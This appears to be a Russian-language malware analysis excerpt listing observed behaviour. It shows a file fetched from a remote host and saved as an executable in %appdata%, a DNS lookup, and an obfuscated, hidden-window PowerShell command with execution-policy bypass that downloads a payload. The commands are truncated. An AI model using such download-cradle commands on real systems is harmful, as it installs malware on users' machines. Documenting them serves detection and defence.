Техническая информация
- http://truepokemonant.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Powe^rsH^el^l.Ex^E -^eXeCUTIonPO^LICY^ ^B^yPAss -NOP^ROFILe -W^i^NDo^WStyLe ^HIddEn (neW-ObJ^E^c^t s^Y^stE^M^.nE^T.^w^E^BcLiE^nt)^.^dOWNLO^AdFIle('http://truepokemonant.top/sear...
- DNS ASK tr####kemonant.top
- '<SYSTEM32>\cmd.exe' /C "Powe^rsH^el^l.Ex^E -^eXeCUTIonPO^LICY^ ^B^yPAss -NOP^ROFILe -W^i^NDo^WStyLe ^HIddEn (neW-ObJ^E^c^t s^Y^stE^M^.nE^T.^w^E^BcLiE^nt)^.^dOWNLO^AdFIle('http://truepokemonant.top/sear...' (со скрытым окном)